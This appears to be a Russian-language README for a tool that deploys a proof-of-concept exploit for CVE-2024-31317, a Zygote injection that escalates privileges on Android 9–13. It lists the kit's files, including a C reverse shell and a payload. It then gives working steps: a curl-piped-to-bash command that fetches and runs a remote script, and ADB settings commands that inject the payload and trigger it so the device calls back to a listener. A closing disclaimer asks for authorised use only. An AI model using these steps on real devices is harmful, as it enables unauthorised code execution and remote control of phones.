
Инструмент автоматического развертывания PoC для CVE-2024-31317 на Android 9-13, обеспечивающий повышение привилегий через внедрение в Zygote и выполнение reverse shell.
Инструмент развертывания proof-of-concept для CVE-2024-31317, нацеленный на устройства Android с версиями 9–13.
CVE-2024-31317-PoC-Deployer — это автоматизированный сценарий развертывания для быстрой генерации и настройки всех файлов, необходимых для эксплуатации уязвимости CVE-2024-31317. Уязвимость затрагивает устройства Android 9–13, позволяя повышать привилегии и выполнять произвольный код через процесс Zygote.
reverse_shell.c — обратный шелл на языке Cpayload.txt — специально сконструированный эксплойт-пейлоадcompile.sh — автоматический сценарий компиляцииREADME.txt — подробная инструкция по использованиюCVE-2024-31317.txt — технический анализ уязвимостиЗапустите удаленный сценарий развертывания:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
Скомпилируйте обратный шелл:
sh compile.sh
Запустите слушатель обратного шелла:
sh reverse_shell
payload.txt в /data/local/tmp/ на целевом устройствеxxx.xxx.xxx в payload.txt на IP-адрес вашего сервера-прослушивателяam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
Данный инструмент предназначен только для законного тестирования безопасности и исследовательских целей. Перед использованием необходимо получить явное разрешение от владельца целевой системы. Несанкционированное использование может противоречить законодательству. Разработчик не несет ответственности за любые злоупотребления.
Этот проект распространяется под лицензией MIT — подробнее см. в файле LICENSE.